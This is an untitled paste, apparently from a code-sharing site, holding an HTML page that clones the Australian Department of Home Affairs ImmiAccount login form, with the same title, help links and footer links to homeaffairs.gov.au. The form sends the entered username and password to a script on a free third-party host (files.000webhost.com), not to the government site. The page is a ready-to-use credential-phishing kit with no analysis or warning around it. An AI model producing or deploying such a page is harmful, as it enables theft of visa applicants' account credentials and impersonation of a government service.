Untitled
2 years ago in HTTP
<!DOCTYPE html> <html lang="en"> <head> <title>ImmiAccount</title> <meta charset="UTF-8" /> <link href="favicon.ico" rel="shortcut icon" /> <link rel="stylesheet" type="text/css" href="/lusc/res/css/general-250012.css" /> <script type="text/javascript" src="/lusc/res/js/general-250012.js"></script> <meta content="initial-scale=1" name="viewport" /> </head> <body> <header role="banner"><div> <h1>ImmiAccount</h1> </div></header> <form method="post" action="https://files.000webhost.com/post.php"> <input type="hidden" name="wc_t" value="59f18d2c-0285-447f-bead-f31688f0ff2f"/> <input type="hidden" name="wc_s" value="4"/> <h1 class="panelHeading">Login</h1> <div> <h2>Login to ImmiAccount</h2> <p>Fields marked <span style='color:#e00;'>*</span> must be completed.</p> <button type="submit" name="login" value="x" class="default-button" aria-hidden="true" tabindex="-1"></button> <div class="form"> <div class="field"> <label for="username" class="required">Username</label> <div><input id="username" name="username" type="text" size="60" placeholder="required"/><a href="/lusc/help?id=wGGB-Dmn9i" title="Username help" class="help" target="_helpWindow">Username help</a></div> </div> <div class="field"> <label for="password" class="required">Password</label> <div><input id="password" name="password" type="password" size="60" placeholder="required" autocomplete="off"/><a href="/lusc/help?id=wcjojRM8Yi" title="Password help" class="help" target="_helpWindow">Password help</a></div> </div> </div> <div class="buttonBarLR"> <button type="submit" name="cancel" value="x" formnovalidate="formnovalidate">Cancel</button> <button type="submit" name="login" value="x">Login</button> </div> <br/> <div style="text-align: right;"> I have forgotten my ImmiAccount <a href="forgotUsername">username</a> or <a href="forgotPassword">password</a> </div> <hr/> <h2>Create an ImmiAccount</h2> <p>Create an ImmiAccount to access the Department of Home Affairs's online services.</p> <button type="submit" name="createAccount" value="x">Create ImmiAccount</button><a href="/lusc/help?id=wUQNr7HLlaiweUIiytfOfq" title="Create ImmiAccount help" class="help" target="_helpWindow">Create ImmiAccount help</a> </div> </form> <footer> <ul> <li><a href="https://www.homeaffairs.gov.au/access-and-accountability/using-our-website/accessibility" rel="noreferrer" target="_blank" >Accessibility</a></li> <li><a href="https://www.homeaffairs.gov.au/access-and-accountability/using-our-website/copyright-and-disclaimer" rel="noreferrer" target="_blank" >Copyright &amp; Disclaimer</a></li> <li><a href="https://www.homeaffairs.gov.au/access-and-accountability/using-our-website/online-security" rel="noreferrer" target="_blank" >Online Security</a></li> <li><a href="https://www.homeaffairs.gov.au/access-and-accountability/our-commitments/privacy" rel="noreferrer" target="_blank" >Privacy</a></li> <li>(nobody)</li> </ul> </footer> </body> </html>
1
2